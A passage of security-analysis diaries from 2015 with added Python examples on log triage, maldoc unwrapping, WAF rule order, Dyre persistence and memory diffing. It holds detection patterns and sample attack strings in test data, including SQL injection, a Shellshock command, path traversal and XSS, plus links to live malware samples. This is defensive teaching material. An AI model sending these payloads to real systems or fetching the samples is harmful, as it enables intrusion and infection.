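# Scanner probes tied to the application they are looking for (constructed list).
APP_SIGNATURES = [
    ("wordpress", re.compile(r"/(wp-login\.php|wp-admin|xmlrpc\.php|wp-content)")),
    ("phpmyadmin", re.compile(r"/(phpmyadmin|pma|myadmin)(/|$)", re.IGNORECASE)),
    ("tomcat", re.compile(r"/manager/html")),
    ("linksys", re.compile(r"/tmUnblock\.cgi")),
]
GENERIC_ATTACK = re.compile(r"\.\./|%2e%2e|/etc/passwd", re.IGNORECASE)
NOISE = re.compile(r"/(favicon\.ico|robots\.txt|apple-touch-icon[\w-]*\.png)$")

TIER_NOISE = "false positive or non-threat"
TIER_NA = "malicious - blocked or not applicable"
TIER_REVIEW = "malicious - not blocked (analyst review)"


def classify(msg, deployed):
    """Map one error-log message to a pyramid tier given the set of applications this server runs."""
    if NOISE.search(msg):
        return TIER_NOISE, None
    for app, rx in APP_SIGNATURES:
        if rx.search(msg):
            return (TIER_REVIEW if app in deployed else TIER_NA), app
    if GENERIC_ATTACK.search(msg):
        return TIER_REVIEW, "generic"
    return TIER_NOISE, None


def triage_error_log(lines, deployed):
    """Return per-line tiers plus counts by tier and malicious hits per source IP."""
    rows, tiers, by_ip = [], Counter(), Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tier, app = classify(m["msg"], deployed)
        rows.append((m["ip"], tier, app))
        tiers[tier] += 1
        if tier != TIER_NOISE:
            by_ip[m["ip"]] += 1
    return {"rows": rows, "tiers": tiers, "by_ip": by_ip}


# Constructed error-log lines (TEST-NET client addresses) of the kind described above.
SAMPLE_LOG = [
    "[Wed May 06 03:12:44 2015] [error] [client 198.51.100.4] File does not exist: /var/www/html/wp-login.php",
    "[Wed May 06 03:12:45 2015] [error] [client 198.51.100.4] script '/var/www/html/xmlrpc.php' not found or unable to stat",
    "[Wed May 06 03:12:46 2015] [error] [client 198.51.100.4] File does not exist: /var/www/html/wp-content/plugins/revslider",
    "[Wed May 06 04:01:02 2015] [error] [client 203.0.113.77] File does not exist: /var/www/html/phpMyAdmin",
    "[Wed May 06 04:01:03 2015] [error] [client 203.0.113.77] File does not exist: /var/www/html/manager/html",
    "[Wed May 06 05:30:10 2015] [error] [client 192.0.2.33] File does not exist: /var/www/html/favicon.ico",
    "[Wed May 06 06:45:51 2015] [error] [client 203.0.113.200] Invalid URI in request GET /../../../etc/passwd HTTP/1.1",
]

if __name__ == "__main__":
    # The server in the text runs no WordPress and no admin UI: only static content.
    report = triage_error_log(SAMPLE_LOG, deployed={"static-html"})
    for ip, tier, app in report["rows"]:
        print(f"{ip:<15} {tier:<42} {app or '-'}")
    print(dict(report["tiers"]))
```

The same seven lines move between tiers when `deployed` changes: run with `deployed={"wordpress"}` and the three WordPress probes jump to the review tier, which is the point of the pyramid. Applicability is a property of your inventory, not of the attacker's traffic, so this filter is only as good as the list of what each host actually serves.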

SOC analysts worried about near-real-time detection of malicious activity generally don't spend much time with this tier of the pyramid.

Next Tier: Malicious Activity - Not Blocked

The next tier of the pyramid involves malicious activity that somehow makes it past your organization's various security measures. This level includes drive-by infections from an exploit kit after viewing a compromised website.  Depending on your organization's policies, adware might be an issue.  Resolving issues involving adware or potentially unwanted programs (PUP) might give SOC personnel practice for resolving hosts infected with actual malware.  Just make sure analysts don't focus on the adware/PUP.  The focus of a SOC should always be on malicious activity.

This level of the pyramid is where analysts develop their skill in recognizing malicious activity.  Exploit kit traffic might not infect a user's computer.  SOC personnel should be able to examine this sort of malicious traffic and determine if a host actually became infected.  After an alert, I've seen too many people assume a host was infected without digging in deeper to see what actually happened.

Malware or compromised hosts found at this level of the pyramid are not targeted.  This type of malicious activity is a concern for any organization.  It's not limited to your employer.

Top of the Pyramid: Targeted Attacks

This tier is where a SOC proves its value to an organization.  If bad actors, criminal groups, or hostile foreign agents gain a foothold in your organization's infrastructure, you might not be able to get rid of them.  Detecting intrusions early and preventing these bad actors from further access is extremely important.  Any number of sources will tell you data breaches are not a matter of "if" but "when" [2][3][4].

Targeted attacks include spear phishing attempts to gather login credentials from specific members.  Personnel using a chat system for sales or support can also be targeted.  Denial of Service (DoS) attacks or Distributed DoS (DDoS) attacks are usually at this tier.  Watering hole attacks [5] are also an issue.

Final Words

I've been a SOC analyst for two employers: one was the government, and the other is private sector.  In both cases, I believe the SOC analyst pyramid applies.  Feel free to leave a comment, if you have any opinions on the matter.

---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] http://www.securitybsides.com/w/page/91978878/BSidesSATX_2015
[2] http://www.securityinfowatch.com/article/12052877/preparing-for-your-companys-inevitable-data-breach
[3] http://www.maslon.com/webfiles/Emails_2015/LegalAlerts/2015_LegalAlert_CyberSecurity_DataBreach_webversion.html
[4] http://www.hechtins.com/blog/data_breach--not_if_but_when.aspx
[5] http://www.trendmicro.com.au/vinfo/au/threat-encyclopedia/web-attack/137/watering-hole-101


Published: 2015-05-10

Wireshark TCP Flags: How To Install On Windows Video

I was asked how to install on Windows the Wireshark TCP Flags dissector I wrote about in a diary entry a month ago.

To help, I made a video.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com


Published: 2015-05-09

Malicious Word Document: This Time The Maldoc Is A MIME File

Bart Blaze tweeted me a malicious Word document sample (MD5 23a2d596d927ceab01918cc1dfd5db68) that cannot be analyzed with my oledump tool. It turns out to be a MIME file that contains an MSO file, which in turn contains an OLE file. We've seen MSO files containing OLE files when we talked about XML Office documents. I've updated my oledump tool (V0.0.15) to handle MSO files directly.

Bart has a blogpost explaining several methods to analyze this file.

If you want to use oledump, first extract the MSO file from the MIME file, then run oledump on it. If you don't have a tool to handle MIME files, I have one: emldump.py.

Here you can see emldump and oledump piped together to analyze the maldoc:
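For readers who want the MIME to MSO to OLE unwrapping in a few dozen lines of Python rather than as a tool chain, the script below is an added example written for this page; it is not oledump, emldump or Bart's code. It parses the MIME document with the standard `email` module, pulls out every `application/x-mso` (ActiveMime) part, and then, as the later diary about schro_193B11.xls describes, scans the MSO blob for the zlib stream instead of assuming it sits at offset 50, accepting a hit only if it inflates to something beginning with the OLE magic bytes. The maldoc itself is not reproduced: `build_sample_mso()` and `build_sample_mime()` construct a stand-in whose compressed stream deliberately sits at offset 60, carrying a fake OLE body with a VBA attribute line so the result is checkable offline.

```python
import base64
import email
import email.policy
import zlib

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
ZLIB_CMF = 0x78                       # CMF byte for deflate with a 32K window
ZLIB_FLG = (0x01, 0x5E, 0x9C, 0xDA)   # FLG bytes that form a valid header with CMF 0x78


def find_compressed_ole(mso):
    """Scan an MSO (ActiveMime) blob for a zlib stream that inflates to an OLE file.
    Returns (offset, ole_bytes) or None. Scanning replaces a fixed offset of 50."""
    if not mso.startswith(b"ActiveMime"):
        return None
    for off in range(len(mso) - 1):
        if mso[off] != ZLIB_CMF or mso[off + 1] not in ZLIB_FLG:
            continue
        try:
            # decompressobj tolerates trailing bytes after the stream; zlib.decompress would not
            out = zlib.decompressobj().decompress(mso[off:])
        except zlib.error:
            continue
        if out.startswith(OLE_MAGIC):
            return off, out
    return None


def extract_mso_parts(mime_bytes):
    """Return the decoded bodies of every MSO part in a MIME (MHTML) document."""
    msg = email.message_from_bytes(mime_bytes, policy=email.policy.default)
    parts = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        body = part.get_payload(decode=True) or b""
        if part.get_content_type() == "application/x-mso" or body.startswith(b"ActiveMime"):
            parts.append(body)
    return parts


def analyze_maldoc(mime_bytes):
    """MIME -> MSO -> OLE, reporting where the zlib stream sat and whether VBA is visible."""
    findings = []
    for mso in extract_mso_parts(mime_bytes):
        hit = find_compressed_ole(mso)
        if hit is None:
            continue
        off, ole = hit
        findings.append({
            "offset": off,
            "ole_size": len(ole),
            "has_vba": b"Attribute VB_Name" in ole,
        })
    return findings


def build_sample_mso():
    """Constructed stand-in for an MSO file: a 60-byte header (so the stream is NOT at offset 50)
    followed by a zlib-compressed fake OLE body carrying a VBA attribute line."""
    fake_ole = OLE_MAGIC + b"\x00" * 504 + b'Attribute VB_Name = "ThisWorkbook"\r\n' + b"\x00" * 100
    header = b"ActiveMime" + bytes(range(0x10, 0x42))   # 10 + 50 bytes, none of them 0x78
    return header + zlib.compress(fake_ole)


def build_sample_mime():
    """Constructed MHTML wrapper around the sample MSO, the shape these maldocs take."""
    boundary = b"----=_NextPart_SAMPLE"
    mso_b64 = base64.encodebytes(build_sample_mso())
    return b"".join([
        b"MIME-Version: 1.0\r\n",
        b'Content-Type: multipart/related; boundary="', boundary, b'"\r\n\r\n',
        b"--", boundary, b"\r\n",
        b'Content-Type: text/html; charset="us-ascii"\r\n\r\n',
        b"<html><body>invoice</body></html>\r\n",
        b"--", boundary, b"\r\n",
        b"Content-Location: file:///C:/editdata.mso\r\n",
        b"Content-Transfer-Encoding: base64\r\n",
        b"Content-Type: application/x-mso\r\n\r\n",
        mso_b64,
        b"\r\n--", boundary, b"--\r\n",
    ])


if __name__ == "__main__":
    for f in analyze_maldoc(build_sample_mime()):
        print(f"zlib stream at offset {f['offset']}, OLE size {f['ole_size']}, VBA seen: {f['has_vba']}")
```

Once `find_compressed_ole` hands back the OLE bytes you are on familiar ground: write them to a file and point oledump (or olevba) at it to get the VBA streams. Validating the inflated data against the OLE magic is what makes the scan safe: random 0x78 bytes inside the header or the compressed data will either fail to inflate or inflate to garbage, and both are rejected.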

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com


Published: 2015-05-07

Security Awareness? How do you keep your staff safe?

If you’ve been following recent diaries from my fellow handlers Brad and Manuel, they peel the covers back on a couple of current malicious email campaigns.  Many readers of the Storm Center diaries will be used to the ebb and flow of these stories. Here in Australia there’s a speeding fine scam email [1] that’s been running for the last few weeks, and there’s no indication it will drop off any time soon. 

There is plenty of training, education and horror stories out on the Internet about malicious email, so why is it a recurring problem? One suggestion is that it plays on human emotions. Threatening or enticing emails are designed to draw in the unsuspecting, and then there are those users who will go to significant lengths to bypass security controls just to see the dancing cat/chicken/Han Solo.

So providing useful and meaningful security awareness isn’t easy; it has to be made relevant to individual audiences, even within the same organization. Giving the same training to senior management and then to a development group will probably miss the mark for both and result in a “Meh, I won’t fall for that”. Sadly, generic security training often produces a trained staff member who still falls victim to a relatively convincing scam.

At this point you’d be expecting some wondrous solution. Sorry, not today.  I will say this is something that takes constant revising, effort and innovative thinking to engage your staff. I’ve mentioned before that SANS has some nifty resources [2], but I really love finding how people try to instill security in their organizations. A security engineer from Riot Games posted how his security team took a different approach to getting in the hearts and minds of their staff about thinking about security as a whole [3]. This goes back to build a story about being security minded that your audience understands, hopefully cares about, and starts to adopt in their working practices and lives. 

Will it stop everyone clicking links or opening random email attachments? I doubt it, but flipping a person from an attack vector to an attack alerter is a worthy goal.

If you have any other examples of innovative ways at getting people to care about good, basic security approaches, please add a comment or drop us a line [4]

 

[1] https://www.service.nsw.gov.au/news/afp-warns-public-email-traffic-infringement-scam   

[2] http://www.securingthehuman.org/resources/

[3] http://blog.markofu.com/2015/01/socialising-security-riot.html

[4] https://isc.sans.edu/contact.html

 

Chris Mohan --- Internet Storm Center Handler on Duty


Published: 2015-05-07

The Art of Logging

[This is a Guest Diary by Xavier Mertens]

Handling log files is not a new topic. People have known for a long time that taking care of your logs is a must: they are very valuable when you need to investigate an incident. But collecting events and storing them for later processing is one thing; the events must also be properly generated if you want to be able to investigate suspicious activity. Take a firewall as an example. Logging all the accepted traffic is one step, but what's really important is to log all the rejected traffic. Most modern security devices (IDS, firewalls, web application firewalls, ...) can integrate dynamic blocklists maintained by external organizations. There are plenty of useful blocklists on the internet with IP addresses, domain names, etc. It's quite easy to add a rule on top of your security policy which says:

if (source_ip in blocklist):
   drop_traffic()

with the "blocklist" table being populated by an external process. Usually this rule is defined at the beginning of the security policy for performance reasons. Very efficient, but is it the right place?

Let's assume a web application firewall (WAF) that has this kind of feature. It will drop every connection from an IP address reported as suspicious right at the start, without recording anything else about the request. Now let's put the blocklist rule at the end of the WAF policy instead. We have something like this:

if (detected_attack(pattern1)):
   drop_traffic()
elif (detected_attack(pattern2)):
  drop_traffic()
elif (detected_attack(pattern3)):
 drop_traffic()
elif  (source_ip in blocklist):
 drop_traffic()

If we block the malicious IP addresses at the beginning of the policy, we'll never know which kind of attack was tried. By blocking them at the end, we know that whenever an IP is dropped by the blocklist rule, none of our attack patterns matched: our policy was not effective enough to block the attack on its own. Maybe a new type of attack was tried and we need to add a new pattern. Blocking attackers is good, but it's more valuable to know why they were blocked…
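The point above is easy to demonstrate with a first-match policy evaluator. The script below is an added example written for this page, not code from the guest diary or any WAF product: the same six requests are run through the same rules twice, once with the blocklist rule first and once with it last, and the log line for each request records which rule dropped it. With the blocklist last, a "blocklist" hit is precisely the set of requests none of the attack patterns recognised, which is what `find_policy_gaps()` returns. The blocklist entries (TEST-NET addresses), the deliberately small signature set and the sample requests are all constructed; the XSS probe is left uncovered on purpose so that one falls through.

```python
import re
from collections import Counter

# Constructed blocklist (TEST-NET addresses) standing in for an external feed.
BLOCKLIST = {"203.0.113.7", "198.51.100.23"}

# Deliberately small signature set so that one request falls through to the blocklist rule.
ATTACK_PATTERNS = [
    ("sqli", re.compile(r"union\s+select|'\s*or\s+1=1|sleep\(", re.IGNORECASE)),
    ("traversal", re.compile(r"\.\./")),
    ("shellshock", re.compile(r"\(\)\s*\{")),
]


def _request_text(req):
    """Text the pattern rules inspect: the request path plus every header value."""
    return req["path"] + " " + " ".join(req.get("headers", {}).values())


def build_policy(blocklist_first):
    """Ordered list of (rule_name, predicate). Only the position of the blocklist rule changes."""
    pattern_rules = [
        (name, (lambda r, rx=rx: bool(rx.search(_request_text(r)))))
        for name, rx in ATTACK_PATTERNS
    ]
    blocklist_rule = ("blocklist", lambda r: r["src"] in BLOCKLIST)
    return [blocklist_rule] + pattern_rules if blocklist_first else pattern_rules + [blocklist_rule]


def evaluate(req, policy):
    """First-match evaluation, the way a firewall or WAF policy works. Returns the rule name or 'allow'."""
    for name, pred in policy:
        if pred(req):
            return name
    return "allow"


def run_policy(requests, blocklist_first):
    """Evaluate every request and return (counts per rule, log lines)."""
    policy = build_policy(blocklist_first)
    counts, log = Counter(), []
    for req in requests:
        rule = evaluate(req, policy)
        counts[rule] += 1
        action = "DROP" if rule != "allow" else "PASS"
        log.append(f"{action} rule={rule} src={req['src']} path={req['path']}")
    return counts, log


def find_policy_gaps(requests):
    """With the blocklist evaluated last, anything it catches got past every attack pattern.
    Those are the requests worth reading: either recon, or an attack we have no rule for."""
    policy = build_policy(blocklist_first=False)
    return [req for req in requests if evaluate(req, policy) == "blocklist"]


# Constructed requests: three from a blocklisted source, one of them an XSS probe no pattern above covers.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "path": "/index.php?id=1' or 1=1"},
    {"src": "203.0.113.7", "path": "/cgi-bin/status.cgi", "headers": {"User-Agent": "() { :; }; /bin/bash -c 'id'"}},
    {"src": "203.0.113.7", "path": "/search?q=<script>alert(1)</script>"},
    {"src": "198.51.100.23", "path": "/"},
    {"src": "192.0.2.5", "path": "/static/../../etc/passwd"},
    {"src": "192.0.2.9", "path": "/about"},
]

if __name__ == "__main__":
    for first in (True, False):
        counts, log = run_policy(SAMPLE_REQUESTS, blocklist_first=first)
        print("blocklist first" if first else "blocklist last", dict(counts))
        for line in log:
            print("  " + line)
    print("gaps:", [r["path"] for r in find_policy_gaps(SAMPLE_REQUESTS)])
```

With the blocklist first, four of the six requests are logged as "blocklist" and the SQL injection and Shellshock attempts are invisible. With it last, those two are attributed to their patterns and only the XSS probe and the bare "/" request reach the blocklist rule, so the daily review of blocklist hits becomes a short list of things the signatures missed. The performance cost of evaluating patterns before the blocklist is real; if it matters, keep the blocklist first but log the request line and headers on the drop, so the analysis can still be done offline.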


Published: 2015-05-05

Upatre/Dyre - the daily grind of botnet-based malspam

Malicious spam (malspam) delivering Upatre/Dyre has been an ongoing issue for quite some time.  Many organizations have posted articles about this malware.  I've read good information on Dyre last year [1, 2] and this year [3]. 

Upatre is the malware downloader that retrieves Dyre (Dyreza), an information stealer described as a "Zeus-like banking Trojan" [4].  Earlier this year, EmergingThreats reported Upatre and Dyre are under constant development [5], while SecureWorks told us banking botnets continue to deliver this malspam despite previous takedowns [6].

Botnets sending waves of malspam with Upatre as zip file attachments are a near-daily occurrence.  Most organizations won't see these emails, because the messages are almost always blocked by spam filters.

Because security researchers find Upatre/Dyre malspam nearly every day, it's a bit tiresome to write about, and we sometimes gloss over the information when it comes our way.  After all, the malspam is being blocked, right?

Nonetheless, we should continue to document some waves of Upatre/Dyre malspam to see if anything is changing or evolving.

Here's one wave we found after searching through our blocked spam filters at Rackspace within the past 24 hours:

  • Start date/time:  2015-05-04 13:48 UTC
  • End date/time:  2015-05-04 16:40 UTC
  • Timespan:  2 hours and 52 minutes
  • Number of emails:  212

We searched for subject lines starting with the word "Holded" and found 31 different subjects:

  • Holded account alert 
  • Holded account caution 
  • Holded account message 
  • Holded account notification 
  • Holded account report 
  • Holded account warning 
  • Holded bank operation alert 
  • Holded bank operation caution 
  • Holded bank operation message 
  • Holded bank operation notification 
  • Holded bank operation report 
  • Holded bank operation warning 
  • Holded operation alert 
  • Holded operation caution 
  • Holded operation message 
  • Holded operation notification 
  • Holded operation report 
  • Holded operation warning 
  • Holded payment alert 
  • Holded payment caution 
  • Holded payment message 
  • Holded payment notification 
  • Holded payment report 
  • Holded payment warning 
  • Holded transaction alert 
  • Holded transaction caution 
  • Holded transaction message 
  • Holded transaction notification 
  • Holded transaction report 
  • Holded transaction warning

The 212 messages had different attachments.  Here's a small sampling of the different file names:

  • abrogation_warning_information.zip
  • block_alert_data.zip
  • block_alert_document.zip
  • block_alert_report.zip
  • block_message_data.zip
  • block_message_statement.zip
  • cancelation_notification_data.zip
  • cancelation_notification_details.zip
  • invalidation_notification_details.zip
  • invalidation_notification_document.zip
  • nullfication_alert_report.zip
  • nullfication_message_information.zip
  • rejection_message_data.zip
  • rejection_notification_details.zip
  • rejection_warning_details.zip
  • rejection_warning_report.zip

Emails sent by this botnet came from different IP addresses before they hit our mail servers.  Senders and message ID headers were all spoofed.  Each of the email headers shows the same Google IP address spoofed as the previous sender.  In the images below, the source IP address--right before the message hit our email servers--is outlined in red.  The spoofed Google IP address is highlighted in blue.  The only true items are the IP addresses from which these emails hit our mail servers.  Everything else cannot be verified and can be considered fake.

This wave sent dozens of different attachment names with hundreds of different file hashes.  I took a random sample and infected a host to generate some traffic.  This Dyre malware is VM-aware, so I had to use a physical host for the infection traffic.  It shows the usual Upatre URLs, Dyre SSL certs and STUN traffic we've seen before with Upatre/Dyre.


Shown above: Filtered Wireshark display of the pcap showing the infection traffic.

Shown above: EmergingThreats-based Snort events on the infection traffic using Security Onion.

Of note, icanhazip.com is a service run by one of my fellow Rackspace employees [7].  By itself, it's not malicious.  icanhazip.com is merely a free service that reports your host's IP address.  Unfortunately, malware authors use this and similar services to check an infected computer's IP address.  Because of that, you'll often find alerts that report any traffic to these domains as an indicator of compromise (IOC).

The Upatre HTTP GET requests didn't return anything.  Apparently, the follow-up Dyre malware was downloaded over one of the SSL connections.  Here's what I grabbed off the infected host:

Dyre first saved to:  C:\Users\username\AppData\Local\Temp\vwlsrAgtqYXVcRW.exe
Dyre was then moved to:  C:\Windows\vwlsrAgtqYXVcRW.exe

Registry keys for persistence:

Key name: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\googleupdate
Key name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\googleupdate
Value name: ImagePath
Value type: REG_EXPAND_SZ
Value data: C:\Windows\vwlsrAgtqYXVcRW.exe
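The persistence entry above has three tells an analyst can check for in any service: the binary sits directly in C:\Windows, its name looks generated, and the service name borrows a vendor's. The following is an added example (not from the diary) that scores a service's ImagePath on those traits; the vendor table and the thresholds are assumptions for illustration, not a vetted rule set.

```python
# Added example (not from the diary): triage a service ImagePath using the
# traits of the Dyre entry above. The vendor table and thresholds are
# assumptions for illustration, not a vetted rule set.
import re
from pathlib import PureWindowsPath

# Service names that borrow a vendor's, with a folder fragment the genuine
# binary's path is expected to contain (assumption).
VENDOR_UPDATERS = {"googleupdate": "program files"}

def executable_from_imagepath(image_path):
    """Strip quotes and arguments from an ImagePath, keeping the .exe path."""
    m = re.match(r'"?([^"]+?\.exe)"?', image_path.strip(), re.I)
    return m.group(1) if m else image_path.strip().strip('"').split()[0]

def looks_random(stem):
    """Generated names tend to have few vowels and erratic case changes."""
    letters = [c for c in stem if c.isalpha()]
    if len(letters) < 8:
        return False
    vowel_ratio = sum(c.lower() in "aeiou" for c in letters) / len(letters)
    case_switches = sum(a.isupper() != b.isupper()
                        for a, b in zip(letters, letters[1:]))
    return vowel_ratio < 0.2 and case_switches >= 3

def assess_service(name, image_path):
    """Return a list of findings for one service; empty means nothing odd."""
    exe = PureWindowsPath(executable_from_imagepath(image_path))
    findings = []
    if str(exe.parent).lower() == r"c:\windows":
        findings.append("binary sits directly in C:\\Windows rather than System32")
    if looks_random(exe.stem):
        findings.append("random-looking file name: " + exe.name)
    expected = VENDOR_UPDATERS.get(name.lower())
    if expected and expected not in str(exe).lower():
        findings.append("service name mimics a vendor whose binary lives under '%s'" % expected)
    return findings

if __name__ == "__main__":
    # The persistence entry recovered from the infected host above.
    for finding in assess_service("googleupdate", r"C:\Windows\vwlsrAgtqYXVcRW.exe"):
        print("-", finding)
```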

A pcap of the infection traffic is available at:

http://malware-traffic-analysis.net/2015/05/04/2015-05-04-upatre-dyre-traffic.pcap.zip

A zip file of the associated Upatre/Dyre sample is available at:

http://malware-traffic-analysis.net/2015/05/04/2015-05-04-upatre-dyre-malware-sample.zip

The zip file is password-protected with the standard password.  If you don't know it, email admin@malware-traffic-analysis.net and ask.

Final words

It's a daily grind reviewing this information, and most security professionals have higher priority issues to deal with.  However, if we don't periodically review these waves of Upatre/Dyre, our front-line analysts and other security personnel might not recognize the traffic and may miss the IOCs.

---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] https://www.us-cert.gov/ncas/alerts/TA14-300A
[2] http://www.secureworks.com/cyber-threat-intelligence/threats/dyre-banking-trojan/
[3] http://securityintelligence.com/dyre-wolf/
[4] http://www.networkworld.com/article/2878966/microsoft-subnet/dyre-banking-trojan-tweaked-to-spread-upatre-malware-via-microsoft-outlook.html
[5] http://www.emergingthreats.net/about-us/blog/dyre-upatre-constant-development
[6] http://www.secureworks.com/cyber-threat-intelligence/threats/banking-botnets-persist-despite-takedowns/
[7] https://major.io/icanhazip-com-faq

3 Comments

Published: 2015-05-04

Traffic pattern change noted in Fiesta exploit kit

A few hours ago, Jerome Segura, Senior Security Researcher at Malwarebytes, tweeted about a change in traffic patterns from Fiesta exploit kit (EK) [1].

What had been semicolons in the URLs from Fiesta EK are now commas.  Here's what I saw in my previous diary on Fiesta EK last week [2]:

Here's what I saw from infecting a host with Fiesta EK a short while ago:

Any signatures for detecting Fiesta EK that depend on those semicolons will need to be updated.

A pcap of the traffic is available at http://malware-traffic-analysis.net/2015/05/04/2015-05-04-Fiesta-EK-traffic.pcap.zip, and a zip file of the associated malware is at http://malware-traffic-analysis.net/2015/05/04/2015-05-04-Fiesta-EK-malware.zip

The ZIP file is password-protected with the standard password.  If you don't know it, email admin@malware-traffic-analysis.net and ask.

I checked out the payload from this infection, and it has a digital signature spoofing Microsoft.

I didn't get any traffic out of the malware payload using publicly available malware analysis tools:

While generating traffic for my previous diary on Fiesta EK, I saw 3 different payloads within a 2 hour period.  Every once in a while, I've seen digital signatures on Fiesta EK malware payloads, but I'm not sure what this particular payload is.  I haven't really had time to analyze it.  If anyone does have time, please leave a comment.

---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] https://twitter.com/jeromesegura/status/595002036027985921
[2] https://isc.sans.edu/diary/Actor+using+Fiesta+exploit+kit/19631

0 Comments

Published: 2015-05-03

VolDiff, for memory image differential analysis

VolDiff is a bash script that runs Volatility plugins against memory images captured before and after malware execution, providing a differential analysis that helps identify IOCs and understand advanced malware behaviour.
I had intended to include it in my latest toolsmith article, Attack & Detection: Hunting in-memory adversaries with Rekall and WinPmem, but quite literally ran out of space and time.
Using WinPmem, as part of the Rekall and GRR offerings, you can acquire two memory images: one clean image prior to infection or compromise, and one after buggering your target system.
As you'll note in the article, I compromised a Windows 7 x64 SP1 VM with a PowerShell one-two punch, the vast majority of which occurred in-memory only. While documenting the related activities for the column, I also took before and after images for VolDiff testing as follows:
winpmem_1.6.2.exe baseline.raw, and after pwnzorship, winpmem_1.6.2.exe compromised.raw.
I then ran ./VolDiff.sh baseline.raw compromised.raw Win7SP1x64 on my Ubuntu server and bingo, after much time and ado (VolDiff takes a while to be sure), out popped VolDiff-report.txt.
To summarize briefly from the article, the malfeasance I unleashed against that poor, unsuspecting VM was all executed in the context of powershell.exe. To that end, did the VolDiff results corroborate the findings achieved with Rekall? Absolutely! Note that the suspicious PIDs from the article are 1284 and 2396. You'll spot them prominently in the following snippets of affirmation:

| |  / /___  / / __ \(_) __/ __/
| | / / __ \/ / / / / / /_/ /_  
| |/ / /_/ / / /_/ / / __/ __/  
|___/\____/_/_____/_/_/ /_/     

Volatility analysis report generated by VolDiff v0.9.3.
Download the latest version from https://github.com/aim4r/VolDiff/.

Suspicious new netscan entries
===========================================================================

0x13c8993d0        UDPv4    0.0.0.0:0    *:*                                   2396     powershell.exe 2015-04-26 17:56:08 UTC+0000
0x13e81acb0        UDPv4    0.0.0.0:0    *:*                                   1284     powershell.exe 2015-04-26 18:17:33 UTC+0000

Suspicious new pslist entries
===========================================================================

0xfffffa8031da1400 cmd.exe                1676   2396      0 --------      1      0 2015-04-26 18:11:52 UTC+0000   2015-04-26 18:15:50 UTC+0000  
0xfffffa8033b17060 powershell.exe         2604   1676      5      250      1      1 2015-04-26 18:12:58 UTC+0000  
0xfffffa80322c2060 cmd.exe                2912   1284      0 --------      1      0 2015-04-26 19:16:50 UTC+0000   2015-04-26 19:19:41 UTC+0000  
0xfffffa8032407460 powershell.exe         1984   2912      6      235      1      0 2015-04-26 19:18:20 UTC+0000                                 

Suspicious new psscan entries
===========================================================================

0x000000013eac2060 cmd.exe            2912   1284 0x0000000055564000 2015-04-26 19:16:50 UTC+0000   2015-04-26 19:19:41 UTC+0000  
0x000000013eb65060 powershell.exe     1284   2244 0x00000000bc783000 2015-04-26 18:17:32 UTC+0000                                 
0x000000013f6a8060 cmd.exe            2288   1284 0x000000006dd6f000 2015-04-26 19:19:44 UTC+0000   2015-04-26 19:55:20 UTC+0000  
0x000000013eb65060 powershell.exe     1284   2244 0x00000000bc783000 2015-04-26 18:17:32 UTC+0000                

Suspicious new ldrmodules entries
===========================================================================

 1284 powershell.exe       0x000000006df70000 False  False  False \Windows\SysWOW64\schannel.dll
 2396 powershell.exe       0x000000006e010000 False  False  False \Windows\SysWOW64\credssp.dll
 
Suspicious new executables
===========================================================================

powershell

Suspicious new malfind entries
===========================================================================

Process: powershell.exe Pid: 2396 Address: 0x6400000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 216, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x06400000  4d 5a e8 00 00 00 00 5b 52 45 55 89 e5 81 c3 d0   MZ.....[REU.....

Process: powershell.exe Pid: 1284 Address: 0x4ff0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 33, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x04ff0000  4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00   MZ..............

Suspicious new getsids entries
===========================================================================
 
powershell.exe (1284): S-1-5-21-1828531342-1736868966-1560356964-513 (Domain Users)
powershell.exe (1284): S-1-1-0 (Everyone)
powershell.exe (1284): S-1-5-114
powershell.exe (1284): S-1-5-32-544 (Administrators)
powershell.exe (1284): S-1-5-32-545 (Users)
powershell.exe (1284): S-1-5-4 (Interactive)
powershell.exe (1284): S-1-2-1 (Console Logon (Users who are logged onto the physical console))
powershell.exe (1284): S-1-5-11 (Authenticated Users)
powershell.exe (1284): S-1-5-15 (This Organization)
powershell.exe (1284): S-1-5-113
powershell.exe (1284): S-1-5-5-0-194227 (Logon Session)
powershell.exe (1284): S-1-2-0 (Local (Users with the ability to log in locally))
powershell.exe (1284): S-1-5-64-10 (NTLM Authentication)
powershell.exe (1284): S-1-16-12288 (High Mandatory Level) 

Yep, powershell.exe definitely did it. :-) Great memory analysis tool from Houcem Hachicha (@aim4r). Give it a try!
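The differential step behind those "Suspicious new pslist entries" is simple to reproduce. The following is an added example, not VolDiff's own code (VolDiff is a bash script; this mirrors its idea in Python): it keys each pslist row on the fields that stay stable between captures, so changed thread and handle counts on an already-running process do not masquerade as new entries. The baseline rows are constructed; the two new rows are copied from the report above.

```python
# Added example, not VolDiff's own code: the differential step VolDiff applies
# to each plugin, shown for Volatility pslist. Baseline rows are constructed;
# the two new rows are copied from the report above.
BASELINE = """\
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xfffffa8030c4b040 System                    4      0     98      531 ------      0 2015-04-26 17:40:02 UTC+0000
0xfffffa8031a2c060 explorer.exe           2244   2200     31      876      1      0 2015-04-26 17:41:10 UTC+0000
0xfffffa8031d0f060 powershell.exe         2396   2244      9      412      1      1 2015-04-26 17:56:07 UTC+0000
"""
# Same processes survive, the existing shell's counters moved on, and two
# children appeared.
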